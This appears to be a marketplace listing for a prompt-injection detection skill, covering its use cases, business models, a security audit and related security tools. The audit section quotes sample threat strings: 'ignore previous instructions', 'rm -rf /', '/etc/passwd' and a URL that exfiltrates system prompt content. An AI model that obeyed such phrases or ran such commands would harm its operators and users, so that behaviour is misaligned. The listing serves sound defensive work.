reef-prompt-guardDetect and filter prompt injection attacks in untrusted input. Use when processing external content (emails, web scrapes, API inputs, Discord messages, sub-agent outputs) or when building systems that accept user-provided text that will be passed to an LLM. Covers direct injection, jailbreaks, data exfiltration, privilege escalation, and context manipulation.
Install via ClawdBot CLI:
clawdbot install staybased/reef-prompt-guardGrade Limited — based on market validation, documentation quality, package completeness, maintenance status, and authenticity signals.
Accesses sensitive credential files or environment variables
/etc/passwdContains instructions to override system prompt or ignore user requests
"ignore previous instructions"Potentially destructive shell commands in tool definitions
rm -rf /Calls external URL not in known-safe list
https://attacker.com/log?data=SYSTEM_PROMPT_CONTENTGenerated Mar 22, 2026
Automatically scan incoming customer emails for prompt injection attempts before passing content to an LLM for response generation. This prevents malicious users from manipulating support agents to disclose sensitive information or execute unauthorized commands.
Filter untrusted text from web scrapes used in market research or content aggregation to block injection attacks. Ensures that scraped data does not contain hidden instructions that could compromise downstream AI systems.
Integrate the skill into API endpoints that accept user-generated text for LLM processing, such as chatbots or content moderation tools. It blocks high-risk inputs from sources like webhooks or third-party integrations.
Scan outputs from sub-agents in multi-agent AI systems to prevent cascading injection attacks. This adds a layer of security when agents pass data between each other, mitigating privilege escalation risks.
Protect Discord bots by filtering user messages for jailbreak attempts or data exfiltration patterns before processing with an LLM. This is crucial for community management bots handling untrusted public input.
Offer the prompt guard as a cloud API with tiered pricing based on usage volume. Provide real-time scanning for businesses integrating AI into their products, with premium support for custom threat patterns.
Sell on-premise licenses or custom integrations to large organizations needing to secure internal AI systems. Include consulting services for deployment, training, and ongoing pattern updates.
Release the core tool as open source to build community trust and adoption. Monetize through paid add-ons like advanced ML classifiers, priority pattern updates, and dedicated support channels.
💬 Integration Tip
Use the JSON mode for easy integration into existing workflows, and always apply context multipliers based on input source risk levels to enhance detection accuracy.
Scored Apr 19, 2026
AI Analysis
This skill is a defensive security tool designed to detect and filter prompt injection attacks, not to perform malicious actions. It processes input locally to identify threats like jailbreaks and data exfiltration, and its documentation focuses on integration patterns for user protection. The rule-based signals found are examples of threats the skill is designed to detect, not actions the skill itself performs.
Audited Apr 16, 2026 · audit v1.0
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
Manage and operate ClawSec Monitor v3.0, a MITM HTTP/HTTPS proxy that logs AI agent traffic, detects exfiltration and injection threats in real time.
Scan Clawdbot and MCP skills for malware, spyware, crypto-miners, and malicious code patterns before you install them. Security audit tool that detects data exfiltration, system modification attempts, backdoors, and obfuscation techniques.
MoltGuard — OpenClaw security guard by OpenGuardrails. Install MoltGuard to protect you and your human from prompt injection, data exfiltration, and maliciou...
Safe command execution for OpenClaw Agents with automatic danger pattern detection, risk assessment, user approval workflow, and audit logging. Use when agen...
Scan ClawHub skills for security vulnerabilities BEFORE installing. Use when installing new skills from ClawHub to detect prompt injections, malware payloads, hardcoded secrets, and other threats. Wraps clawhub install with mcp-scan pre-flight checks.